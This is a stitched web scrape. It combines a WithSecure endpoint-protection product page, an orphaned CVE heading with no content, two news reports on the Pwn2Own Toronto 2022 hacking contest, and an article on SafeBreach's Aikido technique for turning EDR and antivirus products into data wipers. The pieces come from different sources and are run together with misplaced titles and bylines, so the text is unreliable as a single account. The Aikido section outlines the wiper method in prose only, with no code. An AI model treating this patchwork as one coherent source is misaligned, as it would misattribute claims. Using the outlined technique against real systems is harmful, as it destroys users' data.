When an unknown or suspicious program is first launched, DeepGuard temporarily delays its execution in order to perform a file reputation and prevalence rate check, runs it in a sandbox environment, then finally executes it for behavioral analysis and exploit interception.

For more information about Deep Guard functions and benefits, consult our technical whitepaper.

**Compare the versions**

Choose the right version for your needs

Feature

Commad line endition

Full edition

Web-based GUI

 

X

Central control

 

X

Real-time scanning

 

X

Manual Scanning

X

X

Scheduled Scanning

X

X

Operated from the command line

X

 

Managed Firewall

**Better security and compatibility**

The new WithSecure firewall uses the default Windows rule engine to execute firewall rules. This greatly increases compatibility with other applications and appliances. The WithSecure expert ruleset, which contains advanced rules that counter risks such as propagating ransomware and lateral movement, is added on top of the standard Windows ruleset.

The administrator can extend the WithSecure rulesets with rules to tackle company and context-specific threats. Additionally, auto-selection rules allow administrators to define profiles adapted to the security needs of various networks.

Web Traffic Scanning

**Block malicious web content**

Web Traffic Protection prevents the exploitation of active content such as Java and Flash, which are used in the vast majority of online attacks. These components are automatically blocked on unknown and suspicious sites based on their reputation data. Administrators can make exceptions to this by adding sites to a trusted sites list, for example company intranet sites for which WithSecure does not have any reputation data.

Web Traffic Protection scans HTTP web traffic in real-time with multiple complementary anti-malware scanning engines and reputation checks. This ensures that malware and exploits are found and blocked at the traffic stage, before data is written to the hard disk. This provides additional protection against more advanced malware—for example the memory-only variety.

Browsing Protection

**Safe and efficient online work**

Browsing Protection ensures that employees can work safely and efficiently online without worries.

*   Proactively prevents employees from accessing harmful sites, links, and content
*   Eliminates human error and proactively minimizes exposure
*   Works with all major browsers

Botnet Blocker

**Repel botnets effectively**

Botnet Blocker stops criminals aiming to control compromised assets by preventing communication to Command & Control domains.

*   Administrators can prevent network activity relating to known botnets
*   Blocks Domain Name Server (DNS) queries on the host level
*   Can effectively stop most attacks, including ransomware and advanced persistent threats
*   Administrators can filter out queries based on domain reputation with the option of whitelisting them

Connection Control

**Elevated security for vital websites (Premium)**

Connection Control is a security layer that greatly increases protection for business-critical web activity like the use of intranets or sensitive cloud services like CRMs.

As soon as an employee accesses a website that requires additional security, Connection Control automatically elevates the security level for that session. During this period, Connection Control closes network connections to all unknown sites from the endpoint. Users can continue to use sites that are verified safe by WithSecure so as not to reduce employee productivity.

By blocking untrusted connections, banking trojans and other malware cannot send criminals confidential business information such as user credentials and cloud-based information. Security returns to normal when the specified browser process finishes or the user ends the session.

Patch Management

**Automatic patch management (Premium)**

Over 80% of cyber-attacks occur as a result of outdated software. Software Updater automatically keeps your third-party software and Windows up to date and patched against known vulnerabilities. Since it's integrated, you can easily avoid attacks based on known vulnerabilities.

*   Software Updater fully integrated in the solution, no infrastructure needed
*   Automatically patches OS and third-party, non-Microsoft applications
*   Automatically downloads and installs security patches, with a manual setting if needed

Learn more 

DataGuard

**WithSecure DataGuard (Premium)**

WithSecure DataGuard subjects selected high-risk and value-critical folders to advanced monitoring and additional detection logic. It makes them significantly more fortified against ransomware, and prevents malicious and unknown applications from destroying or tampering with the data that they contain. The high-risk and value-critical folders include, for example, the Downloads folder (web downloads), document folders, temp files (email attachments), and data repositories.

The feature's complementary detection logic significantly increases detection accuracy and aggressiveness against ransomware and their encryption processes. The Data Access module ensures that the data in these folders is not destroyed, tampered with, or encrypted by malicious or unknown applications, such as ransomware. Among other benefits, the Data Access module enables the recovery of data in the event of a successful ransomware attack, as it cannot encrypt the data located in those folders.

Application Control

**Prevent applications from executing (Premium)**

Application Control prevents threats from executing and running scripts, even if they bypass other security layers to get onto your device. This mitigates the risks posed by malicious, illegal, and unauthorized software in the corporate environment.

With Application Control you can:

*   Identify and control which applications are allowed to run in your environment
*   Identify trusted, authorized software automatically
*   Prevent all other applications, whether malicious, untrusted, or simply unwanted from running 
*   Eliminate unknown and unwanted applications in your environment to reduce complexity and risk
*   Monitor all applications running within the endpoint environment

Finally, you can use it to block applications from running scripts, for example:

*   Prevent all Microsoft Office applications from running PowerShell scripts
*   Prevent all Microsoft Office applications from running Batch scripts

Application control works based on rules created by our penetration testers that cover attack vectors used to breach into corporate environments. Alternatively, the administrator can define the rules based on various criteria, such as the application name or version.

**Compare the versions**

Choose the right version for your needs

Feature

Standard

Premium

Malware and Spyware Protection

X

X

DeepGuard 6

X

X

Managed Firewall

X

X

Web Traffic Scanning

X

X

Browsing Protection

X

X

Botnet Blocker

X

X

Web Content Control

 

X

Connection Control

 

X

Patch Management

 

X

DataGuard

 

X

Application Control

 

X

**Find an authorized reseller**

We partner with selected resellers to offer our security solutions.

Request a trial

**Request a trial**

Fill in the form and one of our dedicated security expert will reach out to help you get started with your trial.

Contact sales

CVE-2022-45871: Business Suite Virtual Security

Offensive security researchers found 63 previously unreported vulnerabilities in printers, phones, and network-attached storage devices in the Zero Day Initiative's latest hackathon.

Security researchers and hackers demonstrated 63 zero-day vulnerabilities in popular devices at the latest Pwn2Own, exploiting printers from Canon, HP, and Lexmark, and routers and network-attached storage device from Synology and Netgear.

According to Trend Micro's Zero Day Initiative (ZDI), which organized the competition last week, the collection of vulnerabilities earned $989,750 for the offensive cybersecurity specialists competing in the contest. While some attacks chained together a series of exploits to take control of the remote devices, including one that used five vulnerabilities, others found a single security weakness to target, such as the Pentest Limited team, which found a reliable single-click exploit in the Samsung Galaxy S22 mobile phone that required less than a minute to attack.

The Samsung exploit highlighted that significant vulnerabilities are out there to find, says Dustin Child, head of threat awareness at Trend Micro's Zero Day Initiative.

"Just click a link on an affected device and you get owned," he says. "It's a very reliable bug, too. Very impressive research and quite the effective demonstration of why clicking unknown links can be dangerous."

**Focusing on IoT and Mobile**

Pwn2Own started in 2007 as an annual contest connected with the annual CanSecWest conference, but has since branched out into two contests: one focused on computer operating systems and applications, and the other — which includes the latest contest — focused on devices and the Internet of Things.

Over the four days of the contest, offensive cybersecurity specialists discovered a significant number of vulnerabilities in printers and routers from major brands, but also targeted Bluetooth speakers and network-attached storage, ZDI stated in a summary of the contest results.

Because many of the devices are commonly used by small and medium-sized businesses (SMBs), companies should take the results of the competition as a warning, Child says.

"If anything, SMBs should understand that, while they may feel they aren't large enough to be a target, their devices can and will be targeted by threat actors," he says. "At \[this\] time, the attackers are just looking to add nodes to their botnet, but regardless of intent, the devices we rely on for business can be compromised if left undefended."

**Buffer Overflows Continue to Creep In**

Unfortunately, one of the classes of vulnerabilities that continues to represent a fertile field of exploitation for attackers is memory safety vulnerabilities, such as buffer overflows. While major software companies have begun using memory-safe programming languages to prevent memory-related issues, many device-makers are still behind the curve.

Many of the vulnerabilities discovered during the contest were buffer overflows, Child says.

"This form of memory corruption has been known for some time, so we were a bit surprised to see it still prevalent in multiple devices," he says.

Among the most targeted devices were printers, with Lexmark, HP, and Canon printers among those favored by participants. While routers also made up a significant share of targeted devices, they would have seen more abuse this year, except that last-minute patches from Netgear and TP-Link eliminated targeted weaknesses, forcing competitors to withdraw from the competition, Child says.

**Playing the Mario Theme on a Lexmark**

Some of the printer exploits showed additional creativity. In the past, hackers would settle for exploiting a system and forcing it to run Microsoft Paint or call up a calculator application as a demonstration of their potential to run arbitrary code. In the latest Pwn2Own, however, successful hackers displayed Pokemon or another anime character on the small printer control display. 

Perhaps most impressively, the Horizon3 AI team used the system alert sound on a Lexmark printer to play the theme from Mario, even though the device does not have that functionality.

"Since the printer doesn't have a speaker, we didn’t expect it to play a song, but they modulated the frequency of the beep to add the musical function," Child says.

Data management providers Synology and online giant Google both co-sponsored the contest.

Hackers Score Nearly $1M at Device-Focused Pwn2Own Contest

By Habiba Rashid
The Pwn2Own 2023 event will take place in South Beach, Miami, from February 14-16, 2023.
This is a post from HackRead.com Read the original post: Pwn2Own – WD, Samsung Galaxy S22, Canon and more Pwned

Previously **we reported** on the results from Pwn2Own Toronto for Day 1 and Day 2 and today we will be talking about the proceedings of the last two days of the contest. Without further ado, let’s get right into it.

**Pwn2Own Day 3**

On December 08, 2022, the first success of the day went to Team Viettel which earned $20,000 for their execution of an OS Command Injection attack against the WD My Cloud PRO SERIES PR4 100 in the NAS category. 

A newcomer Chi Tran of team Bun Bo Ong Chi executed their stack-based buffer overflow attack against the Canon image CLASS MF74Cdw in the Printer category and was rewarded $10,000 for their hack.

Team DEVCORE on the other hand, used one unique and one previously used bug against the Sonos One Speaker in the Smart Speaker category, earning $22,500. 

NCC Group’s representative team earned $50,000 for hacking a Ubiquiti router and a Lexmark printer in the SOHO Smashup category. The Star Labs team earned $25,000 for an attack targeting a Synology router and a Canon printer. Team Viettel was awarded $37,500 for a hack involving a Cisco router and a Canon printer.

For only the Samsung Galaxy S22 exploits throughout the event, the contestants earned a total of $125,000. Google and Apple phones were not targeted. 

By the end of the third day of the competition, a total of $934,750 had been awarded to the contestants for their successful hacks.

**Watch as Hackers Hack at Pwn2Own**

**Pwn2Own Day 4**

On December 09, 2022, on the fourth day, ZDI, the organization behind Pwn2Own, awarded another $55,000, bringing the total contest prize money to $989,750. 63 unique zero days were purchased during the four-day contest. 

The Master of Pwn title was awarded to the DEVCORE team for their winnings of $142,500 and 18.5 points. Team Viettel and NCC Group followed close behind with 16.5 and 15.5 points respectively. 

Out of the 11 attempts scheduled for the last day of the contest, targeting printers and routers, only 3 were successful since the others either failed or used bugs previously reported in the event. 

The first victory went to Chris Anastasion who used a heap-based buffer overflow to exploit the Lexmark printer, earning $10,000. This was followed by ANHTUD Information Security Department earning $10,000 by using another heap-based overflow to exploit the Canon printer. 

The last successful hack of the Pwn2Own Toronto contest was carried out by the namnp team which won $10,000 for their unique bug against the Canon printer.

**Watch as Hackers Hack at Pwn2Own**

With this, the hacking competition came to an end, marking yet another successful Pwn2Own iteration. However, the Pwn2Own 2023 event will take place in South Beach, Miami, from February 14-16, 2023. It will be an ICS/SCADA-themed event.

1.  **Google Launches Bug Bounty Prog for Open-Source Software**
2.  **Multichain hack: Hacker returns $1m, keeps $150k as bug bounty**
3.  **Xiaomi, Amazon Echo, & Samsung Smart TVs pwned at Pwn2Own**
4.  **Hack the US Army for good with ‘Hack The Army’ bug bounty prog**
5.  **Pwn2Own: Microsoft Exchange server, Teams, Zoom, Chrome pwned**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Pwn2Own – WD, Samsung Galaxy S22, Canon and more Pwned

High-severity security vulnerabilities have been disclosed in different endpoint detection and response (EDR) and antivirus (AV) products that could be exploited to turn them into data wipers.
"This wiper runs with the permissions of an unprivileged user yet has the ability to wipe almost any file on a system, including system files, and make a computer completely unbootable," SafeBreach Labs

Endpoint Detection / Data Security

High-severity security vulnerabilities have been disclosed in different endpoint detection and response (EDR) and antivirus (AV) products that could be exploited to turn them into data wipers.

"This wiper runs with the permissions of an unprivileged user yet has the ability to wipe almost any file on a system, including system files, and make a computer completely unbootable," SafeBreach Labs researcher Or Yair said. "It does all that without implementing code that touches the target files, making it fully undetectable."

EDR software, by design, are capable of continually scanning a machine for potentially suspicious and malicious files, and taking appropriate action, such as deleting or quarantining them.

The idea, in a nutshell, is to trick vulnerable security products into deleting legitimate files and directories on the system and render the machine inoperable by making use of specially crafted paths.

This is achieved by taking advantage of what's called a junction point (aka soft link), where a directory serves as an alias to another directory on the computer.

Put differently, between the window the EDR software identifies a file as malicious and attempts to delete the file from the system, the attacker uses a junction to point the software towards a different path, like C:\\ drive.

The approach, however, didn't result in a wipe as EDRs prevented further access to a file after it was flagged as malicious. What's more, should the rogue file be deleted by the user, the software was clever enough to detect the deletion and stop itself from acting on it.

The ultimate solution arrived in the form of a wiper tool, dubbed Aikido, that triggers the privileged delete by creating a malicious file at a decoy directory and not granting it any permission, causing the EDRs to postpone the delete until next reboot.

Given this new attack interval, all an adversary has to do is delete the directory containing the rogue file, create a junction to point to the target directory to be deleted, and reboot the system.

Successful weaponization of the technique could result in the deletion of system files like drivers, preventing the operating system from booting. It can also be abused to remove all files from administrator user directories.

Out of 11 security products that were tested, six were found vulnerable to the zero-day wiper exploit, prompting the vendors to release updates to address the shortcoming -

*   **CVE-2022-37971** (CVSS score: 7.1) - Microsoft Defender and Defender for Endpoint
*   **CVE-2022-45797** (CVSS score: N/A) - Trend Micro Apex One
*   **CVE-2022-4173** (CVSS score: 8.8) - Avast and AVG Antivirus

"The wiper executes its malicious actions using the most trusted entity on the system — the EDR or AV," Yair said. "EDRs and AVs do not prevent themselves from deleting files."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#zero_day